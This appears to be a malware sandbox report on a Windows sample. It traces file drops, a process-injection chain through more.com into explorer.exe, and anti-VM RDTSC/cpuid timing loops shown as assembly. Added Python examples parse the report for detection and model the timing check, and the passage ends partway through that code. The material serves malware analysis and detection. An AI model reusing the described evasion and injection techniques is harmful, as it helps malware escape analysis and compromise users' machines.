                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: msftedit.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: comsvcs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cmlua.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: cmutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: fontsub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic file information: File size 11391336 > 1048576
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x5d0a00
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x470e00
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: More than 200 imports for user32.dll
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe | Static PE information: section name: .didata
                    Source: cnfpnteryde.1.dr | Static PE information: section name: dld
                    Source: vkqcbyjdfiw.12.dr | Static PE information: section name: dld
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00789FB1 push ecx; ret 14_2_00789FC4
                    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw
                    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde
                    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde
                    Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\more.com | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CNFPNTERYDE
                    Source: C:\Windows\SysWOW64\more.com | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VKQCBYJDFIW
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
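The process-creation rows, the two extensionless files more.com writes to %TEMP% and then loads as modules, and the cross-process section maps and memory writes in the later sections describe one chain: sample -> more.com -> explorer.exe, with code pushed into each child. The script below is an added example, not part of the Joe Sandbox report or of the sample, that parses rows in this report's text export offline (the source and event columns are fused, as in "more.comProcess created: ...") and turns them into a process tree and three findings. The embedded rows are copied from this report; the rule names, function names and the choice of conhost.exe as more.com's only expected child are the example's own.

```python
import re
from collections import defaultdict

# Event names this example keys on. The source column and the event column are
# fused in the text export, so the pattern anchors on the event name, tolerates
# an optional " | " divider and drops the trailing "Jump to ..." link labels.
EVENTS = ("Process created", "File created", "Module Loaded",
          "Memory written", "Section loaded")
ROW = re.compile(
    r"^\s*Source:\s*(?P<src>.+?)\s*\|?\s*(?P<event>"
    + "|".join(re.escape(e) for e in EVENTS)
    + r"):\s*(?P<value>.*?)(?:\s*Jump to (?:behavior|dropped file))?\s*$")

# Input rows copied from this report (raw export form); the first row is of
# another kind and shows that unrelated rows are ignored.
SAMPLE_ROWS = r"""
Source: 5Z1WFRMTOXRH6X21Z8NU8.exeReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiwJump to dropped file
Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\cnfpnterydeJump to dropped file
Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CNFPNTERYDE
Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VKQCBYJDFIW
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: B079C0Jump to behavior
Source: C:\Windows\SysWOW64\more.comMemory written: PID: 4348 base: B079C0 value: 55Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: apphelp.dllJump to behavior
""".splitlines()


def basename(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1]


def first_path(cmdline):
    """Image path from a 'Process created' value (image, then command line)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(" ", 1)[0]  # paths in this report contain no spaces


def parse(lines):
    rows = []
    for line in lines:
        m = ROW.match(line)
        if m:
            rows.append((m["src"], m["event"], m["value"]))
    return rows


def process_tree(rows):
    tree = defaultdict(list)
    for src, event, value in rows:
        if event == "Process created":
            tree[basename(src)].append(basename(first_path(value)))
    return {parent: sorted(kids) for parent, kids in tree.items()}


def analyse(lines):
    children, drops, loads, edges = defaultdict(list), defaultdict(set), defaultdict(set), []
    for src, event, value in parse(lines):
        if event == "Process created":
            children[src].append(first_path(value))
        elif event == "File created":
            drops[src].add(value.lower())
        elif event == "Module Loaded":
            loads[src].add(value.lower())
        elif event == "Section loaded" and value.startswith("NULL target: "):
            target = value[len("NULL target: "):].split(" protection:")[0]
            edges.append((src, target, "section mapped"))
        elif event == "Memory written":
            # "PID: 4348 base: ..." rows name the target by PID only; without a
            # PID-to-image map they stay unresolved and fall through rule 3.
            edges.append((src, value.split(" base:")[0], "memory written"))

    findings = set()
    # Rule 1: more.com is a console pager; its only expected child is its
    # console host, so any other child is proxied execution.
    for parent, kids in children.items():
        if basename(parent).lower() == "more.com":
            for kid in kids:
                if basename(kid).lower() != "conhost.exe":
                    findings.add(f"proxy-exec: {basename(parent)} -> {basename(kid)}")
    # Rule 2: a file the process itself wrote and then mapped as a module
    # (case-insensitive: the report prints the two rows in different cases).
    for proc, written in drops.items():
        for path in written & loads.get(proc, set()):
            findings.add(f"drop-and-load: {basename(proc)} mapped {path}")
    # Rule 3: a section map or memory write into a process that the writer
    # itself created, i.e. create-suspended-and-inject.
    for src, target, how in edges:
        kids = {basename(k).lower() for k in children.get(src, [])}
        if basename(target).lower() in kids:
            findings.add(f"inject-into-child: {basename(src)} -> {basename(target)} ({how})")
    return sorted(findings)


if __name__ == "__main__":
    for parent, kids in process_tree(parse(SAMPLE_ROWS)).items():
        print(f"{parent} -> {', '.join(kids)}")
    for finding in analyse(SAMPLE_ROWS):
        print(finding)
```

Rule 3 only fires when the injection target is a child the writer spawned itself, which is what separates the create-suspended-and-inject pattern from a debugger or a crash handler writing into an unrelated process; the "Memory written: PID: 4348" rows would need the sandbox's PID-to-image table to join.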

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | API/Special instruction interceptor: Address: 75DA7C44
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | API/Special instruction interceptor: Address: 75DA7945
                    Source: C:\Windows\SysWOW64\more.com | API/Special instruction interceptor: Address: 75DA3B54
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | API/Special instruction interceptor: Address: 75DA7C44
                    Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: B0A317
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | API/Special instruction interceptor: Address: 75DA7945
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | RDTSC instruction interceptor: First address: 75DAF3E1, second address: 75DAF3FD, instructions:
                        0x00000000 rdtsc
                        0x00000002 mov dword ptr [ebp-20h], eax
                        0x00000005 mov dword ptr [ebp-1Ch], edx
                        0x00000008 lea esi, dword ptr [ebp-38h]
                        0x0000000b xor eax, eax
                        0x0000000d xor ecx, ecx
                        0x0000000f cpuid
                        0x00000011 mov dword ptr [esi], eax
                        0x00000013 mov dword ptr [esi+04h], ebx
                        0x00000016 mov dword ptr [esi+08h], ecx
                        0x00000019 mov dword ptr [esi+0Ch], edx
                        0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | RDTSC instruction interceptor: First address: 75DAF3FD, second address: 75DAF3E1, instructions:
                        0x00000000 rdtsc
                        0x00000002 mov dword ptr [ebp-18h], eax
                        0x00000005 mov dword ptr [ebp-14h], edx
                        0x00000008 mov eax, dword ptr [ebp-18h]
                        0x0000000b sub eax, dword ptr [ebp-20h]
                        0x0000000e mov ecx, dword ptr [ebp-14h]
                        0x00000011 sbb ecx, dword ptr [ebp-1Ch]
                        0x00000014 add eax, dword ptr [ebp-10h]
                        0x00000017 adc ecx, dword ptr [ebp-0Ch]
                        0x0000001a mov dword ptr [ebp-10h], eax
                        0x0000001d mov dword ptr [ebp-0Ch], ecx
                        0x00000020 jmp 00007F8C64C6CA05h
                        0x00000022 mov edx, dword ptr [ebp-04h]
                        0x00000025 add edx, 01h
                        0x00000028 mov dword ptr [ebp-04h], edx
                        0x0000002b cmp dword ptr [ebp-04h], 64h
                        0x0000002f jnl 00007F8C64C6CA90h
                        0x00000031 rdtsc
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | RDTSC instruction interceptor: First address: 75DAF3E1, second address: 75DAF3FD, instructions:
                        0x00000000 rdtsc
                        0x00000002 mov dword ptr [ebp-20h], eax
                        0x00000005 mov dword ptr [ebp-1Ch], edx
                        0x00000008 lea esi, dword ptr [ebp-38h]
                        0x0000000b xor eax, eax
                        0x0000000d xor ecx, ecx
                        0x0000000f cpuid
                        0x00000011 mov dword ptr [esi], eax
                        0x00000013 mov dword ptr [esi+04h], ebx
                        0x00000016 mov dword ptr [esi+08h], ecx
                        0x00000019 mov dword ptr [esi+0Ch], edx
                        0x0000001c rdtsc
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe | RDTSC instruction interceptor: First address: 75DAF3FD, second address: 75DAF3E1, instructions:
                        0x00000000 rdtsc
                        0x00000002 mov dword ptr [ebp-18h], eax
                        0x00000005 mov dword ptr [ebp-14h], edx
                        0x00000008 mov eax, dword ptr [ebp-18h]
                        0x0000000b sub eax, dword ptr [ebp-20h]
                        0x0000000e mov ecx, dword ptr [ebp-14h]
                        0x00000011 sbb ecx, dword ptr [ebp-1Ch]
                        0x00000014 add eax, dword ptr [ebp-10h]
                        0x00000017 adc ecx, dword ptr [ebp-0Ch]
                        0x0000001a mov dword ptr [ebp-10h], eax
                        0x0000001d mov dword ptr [ebp-0Ch], ecx
                        0x00000020 jmp 00007F8C64C6CA05h
                        0x00000022 mov edx, dword ptr [ebp-04h]
                        0x00000025 add edx, 01h
                        0x00000028 mov dword ptr [ebp-04h], edx
                        0x0000002b cmp dword ptr [ebp-04h], 64h
                        0x0000002f jnl 00007F8C64C6CA90h
                        0x00000031 rdtsc
                    Read together, the two fragments are one loop that runs 64h = 100 times (counter at [ebp-04h]): each pass reads the TSC, executes cpuid with eax = ecx = 0, reads the TSC again, subtracts the two 64-bit values with sub/sbb and adds the difference into a 64-bit accumulator at [ebp-10h]:[ebp-0Ch]. That accumulated cost of cpuid is the RDTSC time measurement the virtualization-detection signature refers to; the same sequence runs in both the sample and the dropped updater copy.
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007D8A00 rdtsc 14_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 180000
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 180000
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 180000
                    Source: C:\Windows\SysWOW64\more.com | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw
                    Source: C:\Windows\SysWOW64\more.com | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cnfpnteryde
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe TID: 7312 | Thread sleep time: -40000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe TID: 8124 | Thread sleep time: -40000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 1720 | Thread sleep time: -90000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 6108 | Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 764 | Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 1720 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe TID: 2504 | Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0079ED13 FindFirstFileExW, 14_2_0079ED13
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007693D0 Sleep, GetVersionExW, GetModuleHandleA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo, GetVersionExW, 14_2_007693D0
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 30000
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 180000
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 180000
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 30000
                    Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 180000
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noreply@vmware.com0
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1!0
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0/
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.0
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007D8A00 rdtsc 14_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0078A195 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 14_2_0078A195
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe | Code function: 0_2_0079A032 mov eax, dword ptr fs:[00000030h] 0_2_0079A032
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007D8A00 mov eax, dword ptr fs:[00000030h] 14_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0078DB50 mov eax, dword ptr fs:[00000030h] 14_2_0078DB50
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00795D42 mov eax, dword ptr fs:[00000030h] 14_2_00795D42
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0078A195 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 14_2_0078A195
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0078E87C IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 14_2_0078E87C
                    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_007898A8 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 14_2_007898A8
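Two of the evasion rows above carry numbers worth checking rather than just reading. The RDTSC fragments do 64-bit arithmetic with 32-bit registers (sub/sbb for the difference, add/adc for the running total), and the per-thread sleep rows, although printed with an "s" suffix, are in milliseconds: 180000 is the three minutes the "long sleeps (>= 3 min)" signature refers to, and the minus sign is how the sandbox prints a relative delay. The script below is an added example, not the sample's code and not part of the report: the first part models the loop's accumulation so it can be compared with plain 64-bit subtraction, the second sums the sleep rows per process image. The cycle threshold for calling cpuid "trapped" and the five-minute sandbox budget are assumptions for illustration; the sleep rows embedded as input are copied from this report.

```python
import re

MASK = 0xFFFFFFFF
ITERATIONS = 0x64                      # cmp dword ptr [ebp-04h], 64h ; jnl -> 100 passes
ASSUMED_CYCLES_PER_CPUID = 1000        # assumption: a VM exit costs far more than native cpuid
ASSUMED_SANDBOX_BUDGET_MS = 300_000    # assumption: five minutes of analysis time


def tsc_loop_total(samples):
    """Model of the two RDTSC fragments: each (before, after) pair is a pair of
    64-bit TSC reads taken around cpuid(0). The difference is formed as lo/hi
    halves with sub/sbb and added to the running total with add/adc, exactly
    as the 32-bit code does with [ebp-20h]/[ebp-1Ch], [ebp-18h]/[ebp-14h]
    and the accumulator [ebp-10h]/[ebp-0Ch]."""
    total_lo = total_hi = 0
    for before, after in samples[:ITERATIONS]:
        b_lo, b_hi = before & MASK, (before >> 32) & MASK
        a_lo, a_hi = after & MASK, (after >> 32) & MASK
        borrow = 1 if a_lo < b_lo else 0
        d_lo = (a_lo - b_lo) & MASK                  # sub eax, dword ptr [ebp-20h]
        d_hi = (a_hi - b_hi - borrow) & MASK         # sbb ecx, dword ptr [ebp-1Ch]
        carry = 1 if total_lo + d_lo > MASK else 0
        total_lo = (total_lo + d_lo) & MASK          # add eax, dword ptr [ebp-10h]
        total_hi = (total_hi + d_hi + carry) & MASK  # adc ecx, dword ptr [ebp-0Ch]
    return (total_hi << 32) | total_lo


def looks_virtualized(samples, threshold=ASSUMED_CYCLES_PER_CPUID):
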